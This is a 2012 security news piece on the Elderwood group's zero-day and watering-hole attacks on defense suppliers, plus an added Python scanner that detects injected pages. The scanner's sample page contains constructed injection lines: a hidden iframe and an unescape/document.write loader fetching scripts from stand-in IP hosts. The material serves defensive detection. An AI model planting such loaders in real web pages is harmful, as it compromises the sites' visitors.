Trojan Attacks Focus on Zero Days

Monday, September 10, 2012 @ 04:09 PM gHale

Over the past three years there have been quite a few high-profile attacks by a group using the Hydraq Trojan. That Trojan, coupled with the use of Zero Day vulnerabilities, has caused serious problems for a number of companies.

These attackers are systematic and reuse components of an infrastructure called the “Elderwood Platform,” according to research on the Symantec Security Response Blog.

The term “Elderwood” comes from the exploit communication used in some of the attacks. This attack platform enables the group to deploy Zero Day exploits quickly. Their methodology has always used spear phishing emails, but there is now an increased adoption of “watering hole” attacks (compromising websites the target victim is likely to visit).

Overall, serious Zero Day vulnerabilities, meaning those exploited in the wild that affect a widely used piece of software, are relatively rare; there were approximately eight in 2011. The past few months, however, have seen four such Zero Day vulnerabilities used by the Elderwood attackers.

Although other attackers use Zero Day exploits (for example, the Sykipot, Nitro, or even Stuxnet attacks), no other group has been seen to use so many. The number of Zero Day exploits used indicates access to a high level of technical capability.

Here are just some of the most recent exploits they have used:
• Adobe Flash Player Object Type Confusion Remote Code Execution Vulnerability (CVE-2012-0779)
• Microsoft Internet Explorer Same ID Property Remote Code Execution Vulnerability (CVE-2012-1875)
• Microsoft XML Core Services Remote Code Execution Vulnerability (CVE-2012-1889)
• Adobe Flash Player Remote Code Execution Vulnerability (CVE-2012-1535)

In order to discover these vulnerabilities, the attackers would have to thoroughly reverse-engineer the compiled applications. That effort would be substantially reduced if they had access to source code. The group seemingly has an unlimited supply of Zero Day vulnerabilities. They appear to use them as needed, often in close succession, switching to a fresh one when exposure of the vulnerability currently in use is imminent.

The primary targets identified are within the defense supply chain, and a majority of them are not top-tier defense organizations themselves. They are companies that manufacture electronic or mechanical components sold to top-tier defense companies. The attackers appear to count on a weaker security posture in these lower-tier organizations and may use these manufacturers as a stepping-stone to gain access to top-tier defense contractors, or to obtain intellectual property used in the production of parts that make up larger products built by a top-tier defense company.

One infection vector that has increased substantially is the “watering hole” attack, a clear shift in the group’s method of operations. The concept is similar to a predator waiting at a watering hole in a desert: the predator knows its prey will eventually have to come to the water, so rather than go hunting, it waits for the victims to come to it.

Similarly, the attackers find a website that caters to a particular audience which includes the target they are interested in. Having identified this website, they hack into it using a variety of means.

The attackers then inject an exploit onto public pages of the website that they hope their ultimate target will visit. Any visitor susceptible to the exploit is compromised, and a back door Trojan ends up on their computer. Three Zero Day exploits, CVE-2012-0779, CVE-2012-1875, and CVE-2012-1889, have all served up back door Trojans from compromised websites over a 30-day period. The increased use of this technique requires the attackers to sift through a much greater amount of stolen information than a targeted attack relying on email, because the number of victims compromised by a web injection attack is much greater.
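The injection described above usually leaves a visible footprint in the page source: an iframe sized to zero pixels or hidden by CSS, a script tag loading from a host that is not the site’s own, or inline script that builds the exploit loader at runtime with unescape() and document.write(). The scanner below is an added example (it is not code from the original article or from Symantec’s research) that checks a page for those three patterns. The sample page, the host names and IP addresses, and the heuristics themselves are constructed assumptions for illustration, not indicators from the Elderwood attacks.

```python
"""Flag HTML that looks like a watering-hole injection.

Added example, not part of the original article. The heuristics are
assumptions chosen to illustrate the technique:
  1. <iframe> or <script src> pointing off-site (not the page's own host),
  2. <iframe> hidden by CSS or sized to 0/1 pixels,
  3. inline script combining unescape() and document.write().
"""
from html.parser import HTMLParser
from urllib.parse import urlparse


class InjectionScanner(HTMLParser):
    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []          # list of (kind, detail) tuples
        self._in_script = False
        self._script_buf = []

    def _is_offsite(self, url):
        """True when url names a host other than the site or its subdomains."""
        host = urlparse(url).hostname
        if not host:
            return False            # relative URL: served from the site itself
        host = host.lower()
        return host != self.site_host and not host.endswith("." + self.site_host)

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)             # HTMLParser lowercases tag and attribute names
        if tag == "iframe":
            src = a.get("src") or ""
            style = (a.get("style") or "").replace(" ", "").lower()
            hidden = "display:none" in style or "visibility:hidden" in style
            for dim in ("width", "height"):
                v = (a.get(dim) or "").strip().rstrip("px")
                if v.isdigit() and int(v) <= 1:
                    hidden = True   # 0x0 or 1x1 frames are invisible to the visitor
            if hidden or self._is_offsite(src):
                self.findings.append(("iframe", src))
        elif tag == "script":
            self._in_script = True
            self._script_buf = []
            src = a.get("src")
            if src and self._is_offsite(src):
                self.findings.append(("script-src", src))

    def handle_data(self, data):
        if self._in_script:
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            body = "".join(self._script_buf)
            if "unescape(" in body and "document.write(" in body:
                self.findings.append(("obfuscated-script", body[:60]))


def scan_page(html, site_host):
    """Return the list of suspicious elements found in html for site_host."""
    scanner = InjectionScanner(site_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample page for a fictional supplier site, example-defense.com.
# The first iframe and script are legitimate; the last two are the injection.
SAMPLE_PAGE = """<html><body>
<h1>Supplier news</h1>
<script src="/js/site.js"></script>
<iframe src="http://cdn.example-defense.com/news" width="600" height="400"></iframe>
<iframe src="http://203.0.113.10/x.swf" width="0" height="0" style="visibility:hidden"></iframe>
<script>document.write(unescape("%3Cscript src='http://198.51.100.7/a.js'%3E%3C/script%3E"));</script>
</body></html>"""

if __name__ == "__main__":
    for kind, detail in scan_page(SAMPLE_PAGE, "example-defense.com"):
        print(f"{kind}: {detail}")
```

Run against a crawl of your own public pages, a scanner like this catches the common case where the attackers append a hidden iframe or a loader script to an existing page; it will not catch an exploit served only to selected visitors by server-side logic, so pair it with a review of the web server’s modified files and access logs.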

Any manufacturer in the defense supply chain needs to be wary of attacks emanating from subsidiaries, business partners, and associated companies, as those organizations may have been compromised and used as a stepping-stone to the true intended target.

Companies and individuals should prepare themselves for a new round of attacks in 2013. This is particularly the case for companies that were compromised in the past and managed to evict the attackers: the knowledge the attackers gained during the previous compromise will assist them in any future attack.
